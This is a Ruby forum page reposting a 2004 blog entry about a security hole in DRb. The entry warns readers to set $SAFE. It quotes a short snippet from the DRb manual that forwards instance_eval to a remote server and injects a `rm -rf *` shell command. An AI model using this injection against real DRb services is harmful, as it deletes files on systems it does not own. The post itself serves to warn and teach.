The Artima Developer Community
Articles | News | Weblogs | Books | Forums
Artima Forums | Articles | Weblogs | Java Answers | News
Sponsored Link

Ruby Buzz Forum
DRb & instance_eval

0 replies on 1 page.

Welcome Guest
  Sign In

Go back to the topic listing  Back to Topic List Click to reply to this topic  Reply to this Topic Click to search messages in this forum  Search Forum Click for a threaded view of the topic  Threaded View   
Previous Topic   Next Topic
Flat View: This topic has 0 replies on 1 page
Red Handed

Posts: 1158
Nickname: redhanded
Registered: Dec, 2004

Red Handed is a Ruby-focused group blog.
DRb & instance_eval Posted: Dec 31, 2004 2:44 PM
Reply to this message Reply

This post originated from an RSS feed registered with Ruby Buzz by Red Handed.
Original Post: DRb & instance_eval
Feed Title: RedHanded
Feed URL: http://redhanded.hobix.com/index.xml
Feed Description: sneaking Ruby through the system 		Latest Ruby Buzz Posts
Latest Ruby Buzz Posts by Red Handed
Latest Posts From RedHanded

Advertisement

There is a nice, little, documented security hole in DRb. Hopefully this’ll help us all remember the importance of $SAFE in our lives.

The DRb manual illustrates with the following code:

 ro = DRbObject::new_with_uri("druby://your.server.com:8989")
 class << ro
   undef :instance_eval  # force call to be passed to remote object
 end
 ro.instance_eval("`rm -rf *`")

So this nugget exposes the unflavoured DRb service to injection of any arbitrary code. Many of you would probably question the legitimacy of leaving a hole like this open. But see: the answer is to give $SAFE = 1, which can’t be a default, can it?

So, if you’re out tinkering with DRb: untaint wisely.

Read: DRb & instance_eval

Topic: SQLite3 Tremors Previous Topic   Next Topic Topic: Cream Of The Free-Tagged
Sponsored Links


Google
  Web Artima.com   

Copyright © 1996-2019 Artima, Inc. All Rights Reserved. - Privacy Policy - Terms of Use